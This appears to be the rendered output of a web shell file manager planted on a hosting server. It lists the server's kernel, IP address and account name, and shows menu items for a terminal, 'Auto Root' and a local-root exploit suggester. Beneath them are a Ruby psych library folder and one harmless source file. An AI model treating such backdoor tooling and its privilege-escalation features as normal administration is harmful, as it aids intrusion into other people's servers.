Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.198
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby26 /
lib64 /
ruby /
2.6.0 /
psych /
Delete
Unzip
Name
Size
Permission
Date
Action
handlers
[ DIR ]
drwxr-xr-x
2026-04-30 23:44
json
[ DIR ]
drwxr-xr-x
2026-04-30 23:44
nodes
[ DIR ]
drwxr-xr-x
2026-04-30 23:44
visitors
[ DIR ]
drwxr-xr-x
2026-04-30 23:44
class_loader.rb
1.91
KB
-rw-r--r--
2023-07-26 18:33
coder.rb
2.05
KB
-rw-r--r--
2023-07-26 18:33
core_ext.rb
359
B
-rw-r--r--
2023-07-26 18:33
exception.rb
264
B
-rw-r--r--
2023-07-26 18:33
handler.rb
7.2
KB
-rw-r--r--
2023-07-26 18:33
nodes.rb
2.35
KB
-rw-r--r--
2023-07-26 18:33
omap.rb
75
B
-rw-r--r--
2023-07-26 18:33
parser.rb
1.67
KB
-rw-r--r--
2023-07-26 18:33
scalar_scanner.rb
4.24
KB
-rw-r--r--
2023-07-26 18:33
set.rb
74
B
-rw-r--r--
2023-07-26 18:33
stream.rb
923
B
-rw-r--r--
2023-07-26 18:33
streaming.rb
667
B
-rw-r--r--
2023-07-26 18:33
syntax_error.rb
585
B
-rw-r--r--
2023-07-26 18:33
tree_builder.rb
2.98
KB
-rw-r--r--
2023-07-26 18:33
versions.rb
222
B
-rw-r--r--
2023-07-26 18:33
visitors.rb
236
B
-rw-r--r--
2023-07-26 18:33
y.rb
190
B
-rw-r--r--
2023-07-26 18:33
Save
Rename
# frozen_string_literal: true require 'psych/exception' module Psych class SyntaxError < Psych::Exception attr_reader :file, :line, :column, :offset, :problem, :context def initialize file, line, col, offset, problem, context err = [problem, context].compact.join ' ' filename = file || '<unknown>' message = "(%s): %s at line %d column %d" % [filename, err, line, col] @file = file @line = line @column = col @offset = offset @problem = problem @context = context super(message) end end end